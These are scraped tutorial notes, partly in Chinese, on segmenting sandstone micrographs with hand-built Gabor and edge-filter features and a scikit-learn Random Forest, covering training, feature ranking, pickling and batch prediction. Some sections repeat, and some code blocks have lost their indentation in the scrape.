    img2 = img.reshape(-1)
    df['Original Image'] = img2

    # Generate Gabor features
    num = 1
    kernels = []
    for theta in range(2):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
    for lamda in np.arange(0, np.pi, np.pi / 4):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor' + str(num)
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter image and add values to new column
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img # Modify this to add new column for each gabor
    num += 1
    ########################################
    # Geerate OTHER FEATURES and add them to the data frame
    # Feature 3 is canny edge
    edges = cv2.Canny(img, 100,200) # Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1 # Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # Feature 4 is Roberts edge
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # Feature 5 is Sobel
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # Feature 6 is Scharr
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # Feature 7 is Prewitt
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # Feature 8 is Gaussian with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # Feature 9 is Gaussian with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # Feature 10 is Median with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # Feature 11 is Variance with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    return df
    import glob
    import pickle
    from matplotlib import pyplot as plt

    filename = "sandstone_model"
    loaded_model = pickle.load(open(filename, 'rb'))

    path = "images/Train_images/*.tif"
    for file in glob.glob(path):
    print(file) # just stop here to see all file names printed
    img = cv2.imread(file, 0)
    # Call the feature extraction function.
    X = feature_extraction(img)
    result = loaded_model.predict(X)
    segmented = result.reshape((img.shape))

    name = file.split("e_")
    cv2.imwrite('images/Segmented/'+ name[1], segmented)

    jpg

    67b - Feature based image segmentation using traditional machine learning. -Multi-training images-

    总结通过传统机器学习方法进行图像分类的各个步骤。

    使用随机森林或支持向量机,这是传统的机器学习方法之一,我相信这比深度学习方法要好得多,因为对于大多数应用程序来说,您通常没有深度学习所需的数据类型,因此传统机器学习有时效果很好,如果您没有大量训练数据,实际上有时比深度学习好得多。

    import numpy as np
    import cv2
    import pandas as pd
    import pickle
    from matplotlib import pyplot as plt
    import os
    • STEP 1: READ TRAINING IMAGES AND EXTRACT FEATURES
    image_dataset = pd.DataFrame()  # Dataframe to capture image features

    img_path = "images/train_images/"
    for image in os.listdir(img_path): # iterate through each file
    print(image)

    df = pd.DataFrame() # Temporary data frame to capture information for each loop.
    # Reset dataframe to blank after each loop.

    input_img = cv2.imread(img_path + image) # Read images

    # Check if the input image is RGB or grey and convert to grey if RGB
    if input_img.ndim == 3 and input_img.shape[-1] == 3:
    img = cv2.cvtColor(input_img,cv2.COLOR_BGR2GRAY)
    elif input_img.ndim == 2:
    img = input_img
    else:
    raise excerption("The module works only with grayscale and RGB images!")

    ################################################################
    # START ADDING DATA TO THE DATAFRAME

    # Add pixel values to the data frame
    pixel_values = img.reshape(-1)
    df['Pixel_Value'] = pixel_values # Pixel value itself as a feature
    df['Image_Name'] = image # Capture image name as we read multiple images

    ############################################################################
    # Generate Gabor features
    num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
    kernels = []
    for theta in range(2): # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3): # Sigma with 1 and 3
    for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
    for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
    gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter the image and add values to a new column
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img #Labels columns as Gabor1, Gabor2, etc.
    print(gabor_label, ': theta=', theta, ': sigma=', sigma, ': lamda=', lamda, ': gamma=', gamma)
    num += 1 # Increment for gabor column label
    ########################################
    # Gerate OTHER FEATURES and add them to the data frame

    # CANNY EDGE
    edges = cv2.Canny(img, 100,200) #Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1 #Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # ROBERTS EDGE
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # GAUSSIAN with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # GAUSSIAN with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # MEDIAN with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # VARIANCE with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    ######################################
    # Update dataframe for images to include details for each image in the loop
    image_dataset = image_dataset.append(df)
    • STEP 2: READ LABELED IMAGES (MASKS) AND CREATE ANOTHER DATAFRAME WITH LABEL VALUES AND LABEL FILE NAMES
    mask_dataset = pd.DataFrame()  # Create dataframe to capture mask info.

    mask_path = "images/train_masks/"
    for mask in os.listdir(mask_path): # iterate through each file to perform some action
    print(mask)

    df2 = pd.DataFrame() # Temporary dataframe to capture info for each mask in the loop
    input_mask = cv2.imread(mask_path + mask)

    # Check if the input mask is RGB or grey and convert to grey if RGB
    if input_mask.ndim == 3 and input_mask.shape[-1] == 3:
    label = cv2.cvtColor(input_mask,cv2.COLOR_BGR2GRAY)
    elif input_mask.ndim == 2:
    label = input_mask
    else:
    raise excerption("The module works only with grayscale and RGB images!")

    # Add pixel values to the data frame
    label_values = label.reshape(-1)
    df2['Label_Value'] = label_values
    df2['Mask_Name'] = mask

    mask_dataset = mask_dataset.append(df2) # Update mask dataframe with all the info from each mask
    • STEP 3: GET DATA READY FOR RANDOM FOREST (or other classifier) COMBINE BOTH DATAFRAMES INTO A SINGLE DATASET
    dataset = pd.concat([image_dataset, mask_dataset], axis=1)  # Concatenate both image and mask datasets

    # If you expect image and mask names to be the same this is where we can perform sanity check
    # dataset['Image_Name'].equals(dataset['Mask_Name'])
    # If we do not want to include pixels with value 0
    # e.g. Sometimes unlabeled pixels may be given a value 0.
    dataset = dataset[dataset.Label_Value != 0]

    # Assign training features to X and labels to Y
    # Drop columns that are not relevant for training (non-features)
    X = dataset.drop(labels = ["Image_Name", "Mask_Name", "Label_Value"], axis=1)

    # Assign label values to Y (our prediction)
    Y = dataset["Label_Value"].values

    # Split data into train and test to verify accuracy after fitting the model.
    from sklearn.model_selection import train_test_split
    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    • STEP 4: Define the classifier and fit a model with our training data
    # Import training classifier
    from sklearn.ensemble import RandomForestClassifier
    # Instantiate model with n number of decision trees
    model = RandomForestClassifier(n_estimators = 50, random_state = 42)

    # Train the model on training data
    model.fit(X_train, y_train)
    • STEP 5: Accuracy check
    from sklearn import metrics

    prediction_test = model.predict(X_test)
    # Check accuracy on test dataset.
    print("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
    • STEP 6: SAVE MODEL FOR FUTURE USE
    # You can store the model for future use. In fact, this is how you do machine elarning
    # Train on training images, validate on test images and deploy the model on unknown images.
    # Save the trained model as pickle string to disk for future use
    model_name = "sandstone_model"
    pickle.dump(model, open(model_name, 'wb'))
    ]]>
+ Body

    59 - What is Random Forest classifier

Many decision trees combined make a forest — that is the random forest.

• Decision tree

For example, suppose we want to classify an image into:

• Air

• Pyrite

• Clay

• Pore

• Quartz

We classify from the image's pixel value (gray level) and texture:

    jpg

• Why start with pixel value and not a texture metric for this image?

  • Because it gives the best split of the input data.

• How to pick a node that gives the best split?

  • Use Gini impurity → pick the one that maximizes the Gini gain.

• Gini impurity is the probability of incorrectly classifying a randomly chosen element of the dataset if it were randomly labeled according to the class distribution in the dataset. It is calculated as (a small computational sketch follows below the figure)

$$G=\sum^C_{i=1}p(i)\left(1-p(i)\right)$$

• where $C$ is the number of classes and $p(i)$ is the probability of randomly picking an element of class $i$.

• Primary disadvantage of decision trees:
  they often suffer from overfitting → a tree works well on the training data but fails on new data, leading to low accuracy.

• Random Forest to the rescue! An ensemble of trees mitigates the overfitting of a single decision tree.

    jpg
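To make the Gini formula concrete, here is a minimal sketch (my own illustration, not from the video) that computes the impurity of a set of class labels; the `labels` arrays are hypothetical examples.

import numpy as np

def gini_impurity(labels):
    # G = sum over classes of p(i) * (1 - p(i))
    _, counts = np.unique(labels, return_counts=True)
    p = counts / counts.sum()  # class probabilities p(i)
    return float(np.sum(p * (1 - p)))

print(gini_impurity(np.array([1, 1, 1, 1])))  # 0.0  (pure node)
print(gini_impurity(np.array([1, 2, 1, 2])))  # 0.5  (worst case for two classes)

A split's Gini gain is the parent impurity minus the size-weighted impurities of the children; the tree greedily picks the split with the largest gain.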

    60 - How to use Random Forest in Python

    import pandas as pd
    import matplotlib.pyplot as plt
    import numpy as np

    df = pd.read_csv('data/images_analyzed_productivity1.csv')
    df.head()
    User Time Coffee Age Images_Analyzed Productivity
    0 1 8 0 23 20 Good
    1 1 13 0 23 14 Bad
    2 1 17 0 23 18 Good
    3 1 22 0 23 15 Bad
    4 1 8 2 23 22 Good
    sizes = df['Productivity'].value_counts(sort=1)
    sizes
Bad     42
Good    38
Name: Productivity, dtype: int64

Drop the irrelevant columns

    df.drop(['Images_Analyzed'], axis=1, inplace=True)
    df.drop(['User'], axis=1, inplace=True)
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 Good
    1 13 0 23 Bad
    2 17 0 23 Good
    3 22 0 23 Bad
    4 8 2 23 Good

Drop rows with missing data

    df = df.dropna()

Convert the labels to numbers

# Use .loc to avoid the pandas chained-assignment pitfall
df.loc[df.Productivity == 'Good', 'Productivity'] = 1
df.loc[df.Productivity == 'Bad', 'Productivity'] = 2
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 1
    1 13 0 23 2
    2 17 0 23 1
    3 22 0 23 2
    4 8 2 23 1

Define the dependent variable

    Y = df['Productivity'].values
    Y = Y.astype('int')
    Y
array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,
       1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,
       1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,
       1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])

Define the independent variables

    X = df.drop(labels=['Productivity'], axis=1)

Split the data into training and test sets

    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)

Use a random forest

    sklearn.ensemble.RandomForestClassifier

    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
array([1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 1, 2, 1, 2,
       1, 1, 2, 1, 1, 2, 1, 1, 1, 1])

Compute the accuracy of the trained model

    from sklearn import metrics

    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375

Increasing the share of training data can improve accuracy (here the accuracy happens to stay the same):

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375

Show the feature importances

    feature_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=feature_list).sort_values(ascending=False)
    feature_imp
Time      0.714433
Coffee    0.205474
Age       0.080092
dtype: float64

Visualizing the random forest

    python 随机森林可视化_阿雷吖睚的博客-CSDN 博客_随机森林可视化

from IPython.display import HTML, display
from sklearn import tree
import pydotplus

estimators = model.estimators_
for m in estimators:
    dot_data = tree.export_graphviz(m, out_file=None,
                                    feature_names=['Time', 'Coffee', 'Age'],
                                    class_names=['Good', 'Bad'],
                                    filled=True, rounded=True,
                                    special_characters=True)
    graph = pydotplus.graph_from_dot_data(dot_data)
    # Display the tree inline in a Jupyter notebook via IPython.
    svg = graph.create_svg()
    if hasattr(svg, "decode"):
        svg = svg.decode("utf-8")
    html = HTML(svg)
    display(html)

    svg

    61 - How to create Gabor feature banks for machine learning

    import numpy as np
    import cv2
    import matplotlib.pyplot as plt
    import pandas as pd
    img = cv2.imread('images/synthetic.jpg', 0)
    df = pd.DataFrame()
    img2 = img.reshape(-1)
    df['Original Pixels'] = img2
    df
    Original Pixels
    0 255
    1 255
    2 255
    3 255
    4 255
    ... ...
    363446 255
    363447 255
    363448 255
    363449 255
    363450 255

    363451 rows × 1 columns

Construct different convolution kernels by varying the Gabor parameters, then generate a CSV file for machine learning:

num = 1
for sigma in (3, 5):
    for theta in range(2):
        theta = theta / 4. * np.pi
        for lamda in np.arange(0, np.pi, np.pi / 4.):
            for gamma in (0.05, 0.5):
                gabor_label = 'Gabor ' + str(num)
                kernel = cv2.getGaborKernel((5, 5), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                filtered_img = fimg.reshape(-1)
                df[gabor_label] = filtered_img
                num += 1
    df.head()
    Original Pixels Gabor 1 Gabor 2 Gabor 3 Gabor 4 Gabor 5 Gabor 6 Gabor 7 Gabor 8 Gabor 9 ... Gabor 23 Gabor 24 Gabor 25 Gabor 26 Gabor 27 Gabor 28 Gabor 29 Gabor 30 Gabor 31 Gabor 32
    0 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    1 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    2 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    3 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    4 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255

    5 rows × 33 columns

    df.to_csv('Gabor.csv')

    png

    62 - Image Segmentation using traditional machine learning - The plan

A short overview of what the next few videos will do.

    63 - Image Segmentation using traditional machine learning Part1 - FeatureExtraction

    import numpy as np
    import cv2
    import pandas as pd
    import matplotlib.pyplot as plt

    img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x17d0c13f730>

    png

    df = pd.DataFrame()
    • Add original pixel values to the data frame as feature #1
    img2 = img.reshape(-1)
    df['Original Image'] = img2
    df.head()
    Original Image
    0 0
    1 0
    2 0
    3 0
    4 0
    • Add Other features

    • First set - Gabor features

# Generate Gabor features
num = 1  # To count numbers up in order to give Gabor features a label in the data frame
kernels = []
for theta in range(2):  # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3):  # Sigma with 1 and 3
        for lamda in np.arange(0, np.pi, np.pi / 4):  # Range of wavelengths
            for gamma in (0.05, 0.5):  # Gamma values of 0.05 and 0.5
                gabor_label = 'Gabor' + str(num)  # Label Gabor columns as Gabor1, Gabor2, etc.
                ksize = 9
                kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                kernels.append(kernel)
                # Now filter the image and add values to a new column
                fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                filtered_img = fimg.reshape(-1)
                df[gabor_label] = filtered_img  # Labels columns as Gabor1, Gabor2, etc.
                print(gabor_label, ': theta =', theta, ': sigma =', sigma, ': lamda =', lamda, ': gamma =', gamma)
                num += 1  # Increment for gabor column label
Gabor1 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.05
Gabor2 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.5
Gabor3 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05
Gabor4 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5
Gabor5 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05
Gabor6 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5
Gabor7 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05
Gabor8 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5
Gabor9 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.05
Gabor10 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.5
Gabor11 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05
Gabor12 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5
Gabor13 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05
Gabor14 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5
Gabor15 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05
Gabor16 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5
Gabor17 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.05
Gabor18 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.5
Gabor19 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05
Gabor20 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5
Gabor21 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05
Gabor22 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5
Gabor23 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05
Gabor24 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5
Gabor25 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.05
Gabor26 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.5
Gabor27 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05
Gabor28 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5
Gabor29 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05
Gabor30 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5
Gabor31 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05
Gabor32 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5
• Generate OTHER FEATURES and add them to the data frame

    • Canny edge

    edges = cv2.Canny(img, 100, 200)
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1
    • ROBERTS EDGE
    from skimage.filters import roberts, sobel, scharr, prewitt

    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1
    • SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1
    • SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1
    • PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1
    • GAUSSIAN with sigma = 3
    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1
    • GAUSSIAN with sigma = 7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3
• MEDIAN with size = 3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1
    • VARIANCE with size = 3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    df.head()
    Original Image Gabor1 Gabor2 Gabor3 Gabor4 Gabor5 Gabor6 Gabor7 Gabor8 Gabor9 ... Gabor32 Canny Edge Roberts Sobel Scharr Prewitt Gaussian s3 Gaussian s7 Median s3 Variance s3
    0 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    1 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    2 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    3 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    4 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0

    5 rows × 42 columns


    labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif', 0)
    labeled_img1 = labeled_img.reshape(-1)
    df['Label'] = labeled_img1

    64 - Image Segmentation using traditional machine learning - Part2 Training RF

• Dependent and independent variables
    Y = df['Label'].values
    X = df.drop(labels=['Label'], axis=1)
    • Split data into test and train
    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
    • Import ML algorithm and train the model
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=42)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    from sklearn import metrics

    print("Accuracy =", metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9812850216441728

    65 - Image Segmentation using traditional machine learning - Part3 Feature Ranking

fig = plt.figure(figsize=(12, 16))
p = 1
for index, feature in enumerate(df.columns):
    if index == 0:
        p += 1
        ax = fig.add_subplot(181)
        plt.xticks([])
        plt.yticks([])
        ax.imshow(img, cmap='gray')
        ax.title.set_text(feature)
    else:
        if p % 8 == 1:
            p += 1
        exec("ax" + str(index) + " = fig.add_subplot(6, 8, " + str(p) + ")")
        plt.xticks([])
        plt.yticks([])
        exec("ax" + str(index) + ".imshow(np.array(df[feature]).reshape(img.shape), cmap='gray')")
        exec("ax" + str(index) + ".title.set_text('" + feature + "')")
        p += 1
plt.show()

    png

    importances = list(model.feature_importances_)
    features_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=features_list).sort_values(ascending=False)
    feature_imp
Gabor4            0.248493
Gaussian s3       0.168623
Median s3         0.122685
Original Image    0.092540
Gabor8            0.086585
Gabor11           0.076893
Gabor3            0.070587
Gabor6            0.021357
Gaussian s7       0.020470
Gabor24           0.011645
Gabor7            0.010555
Prewitt           0.010252
Gabor21           0.007676
Sobel             0.007102
Gabor23           0.006989
Gabor5            0.006329
Scharr            0.005543
Roberts           0.005393
Gabor22           0.004461
Variance s3       0.002942
Gabor31           0.002886
Gabor29           0.002720
Gabor32           0.002607
Gabor30           0.002361
Canny Edge        0.001267
Gabor12           0.001025
Gabor20           0.000011
Gabor28           0.000002
Gabor27           0.000002
Gabor14           0.000000
Gabor26           0.000000
Gabor25           0.000000
Gabor1            0.000000
Gabor19           0.000000
Gabor18           0.000000
Gabor17           0.000000
Gabor16           0.000000
Gabor10           0.000000
Gabor9            0.000000
Gabor15           0.000000
Gabor2            0.000000
Gabor13           0.000000
dtype: float64

    66 - Image Segmentation using traditional machine learning - Part4 Pickling Model

    import pickle

    filename = 'sandstone_model'
    pickle.dump(model, open(filename, 'wb'))

    load_model = pickle.load(open(filename, 'rb'))
    result = load_model.predict(X)

segmented = result.reshape(img.shape)
    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='jet')
    <matplotlib.image.AxesImage at 0x17d37062220>

    png

    plt.imsave('segmented_rock.jpg', segmented, cmap='jet')

    67 - Image Segmentation using traditional machine learning - Part5 Segmenting Images

    import numpy as np
    import cv2
    import pandas as pd

def feature_extraction(img):
    df = pd.DataFrame()

    # All features generated must match the way features are generated for TRAINING.
    # Feature 1 is our original image pixels
    img2 = img.reshape(-1)
    df['Original Image'] = img2

    # Generate Gabor features
    num = 1
    kernels = []
    for theta in range(2):
        theta = theta / 4. * np.pi
        for sigma in (1, 3):
            for lamda in np.arange(0, np.pi, np.pi / 4):
                for gamma in (0.05, 0.5):
                    gabor_label = 'Gabor' + str(num)
                    ksize = 9
                    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                    kernels.append(kernel)
                    # Now filter the image and add values to a new column
                    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                    filtered_img = fimg.reshape(-1)
                    df[gabor_label] = filtered_img  # Add a new column for each Gabor kernel
                    num += 1
    ########################################
    # Generate OTHER FEATURES and add them to the data frame
    # Feature 3 is Canny edge
    edges = cv2.Canny(img, 100, 200)  # Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1  # Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # Feature 4 is Roberts edge
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # Feature 5 is Sobel
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # Feature 6 is Scharr
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # Feature 7 is Prewitt
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # Feature 8 is Gaussian with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # Feature 9 is Gaussian with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # Feature 10 is Median with size=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # Feature 11 is Variance with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1  # Add column to original dataframe

    return df
import glob
import pickle
from matplotlib import pyplot as plt

filename = "sandstone_model"
loaded_model = pickle.load(open(filename, 'rb'))

path = "images/Train_images/*.tif"
for file in glob.glob(path):
    print(file)  # just stop here to see all file names printed
    img = cv2.imread(file, 0)
    # Call the feature extraction function.
    X = feature_extraction(img)
    result = loaded_model.predict(X)
    segmented = result.reshape(img.shape)

    name = file.split("e_")
    cv2.imwrite('images/Segmented/' + name[1], segmented)

    jpg

    67b - Feature based image segmentation using traditional machine learning. -Multi-training images-

A summary of the steps of image segmentation (pixel classification) with traditional machine learning.

Use a random forest or a support vector machine — classic traditional machine learning. I believe this can be much better than a deep learning approach here, because for most applications you simply do not have the kind of data deep learning needs; traditional machine learning often works well and, when you lack large training sets, can actually be much better than deep learning.

    import numpy as np
    import cv2
    import pandas as pd
    import pickle
    from matplotlib import pyplot as plt
    import os
    • STEP 1: READ TRAINING IMAGES AND EXTRACT FEATURES
image_dataset = pd.DataFrame()  # Dataframe to capture image features

img_path = "images/train_images/"
for image in os.listdir(img_path):  # iterate through each file
    print(image)

    df = pd.DataFrame()  # Temporary data frame to capture information for each loop.
    # Reset dataframe to blank after each loop.

    input_img = cv2.imread(img_path + image)  # Read images

    # Check if the input image is RGB or grey and convert to grey if RGB
